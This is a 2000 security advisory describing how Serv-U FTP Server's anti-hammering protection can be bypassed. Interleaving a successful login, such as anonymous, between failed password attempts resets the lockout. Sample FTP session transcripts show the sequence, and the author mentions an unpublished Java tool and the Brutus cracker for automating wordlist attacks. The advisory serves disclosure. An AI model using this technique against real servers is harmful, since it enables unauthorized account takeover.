Advisories : Brute Forcing FTP Servers with enabled anti-hammering (ant brute-force) modus

main menu

- feedback
- advertising
- privacy
- FightAIDS
- newsletter
- news

discussions

- read forum
- new topic
- search

meetings

- meetings list
- recent additions
- add your info

top 100 sites

- visit top sites
- sign up now
- members

webmasters

- add your url
- add domain
- search box
- link to us

projects

- our projects
- free email

m4d network

- security software
- secureroot
- m4d.com

Home : Advisories : Brute Forcing FTP Servers with enabled anti-hammering (ant brute-force) modus

Title:	Brute Forcing FTP Servers with enabled anti-hammering (ant brute-force) modus
Released by:	Craig
Date:	30th October 2000
Printable version:	Click here

Brute Forcing FTP Servers with enabled anti-hammering (ant brute-force) modus

-----------------------------------------------------------------------------



While playing around with Serv-U FTP Server, I found out that it is

possible to bypass it's hammering protection which should protect accounts

from being brute-forced. In the following text I will explain this step by

step.





A user logs into an ftp server like this:



USER USERNAME

PASS PASSWORD



When the user entered an invalid password for 3 times he will be

disconnected and is not allowed to connect again for a specified time - so

far so good, but i wondered what happened if I tried another users account

in order to try 3 passwords for every user per connection (lines with the

prefix ">" are from the server) :



USER USER1

>331 User name okay, need password.

PASS PASSWORD

>530 Not logged in.



USER USER1

>331 User name okay, need password.

PASS nextpassPASSWORD

>530 Not logged in.



USER USER2

>331 User name okay, need password.

PASS anotherPASSWORD

>530 Not logged in.



I was disconnected, and already about to give up when I noticed that anonymous

login was enabled:



USER USER1

>331 User name okay, need password.

PASS PASSWORD

>530 Not logged in.



USER USER1

>331 User name okay, need password.

PASS nextpassPASSWORD

>530 Not logged in.



USER anonymous

>331 User name okay, please send complete E-mail address as password.

PASS somemail@address.com

>230 User logged in, proceed.



USER USERNAME

>331 User name okay, need password.

PASS 3rdPASSWORD

>530 Not logged in.



USER USERNAME

>331 User name okay, need password.

PASS 4thPASSWORD

>530 Not logged in.



...

...



BINGO! That worked!



This does not only work with anonymous access, you just need to log into an

account and then you can retry to log into the user's account!



I coded a little program in java to automate the brute forcing process

which reads the passwords from a wordlist. In my local network it tested

about 100 passwords per minute - that is not very fast, but it only uses

one connection and as far as i know it's the only tool that bypasses the

anti brute-force function...



Brutus-aet2 (with 10 connections, 10ms timeout, disabled anti-hammering of

course) made 20 tries per second - my program is only single-threaded, but

if its method was implented into brutus-aet3 it might be the fastest ftp

brute-force tool ever :)





- Craig



Craig@Freenet.de

http://www.HaQuarter.De (only German yet)

Download Brutus at http://www.hobbie.net/brutus



P.S.:Before writing this, I did a quick search at securityfocus, but i did

not find anything about this issue, if this was already known i am sorry

for wasting your time!







--------------------------------------------------------------------------------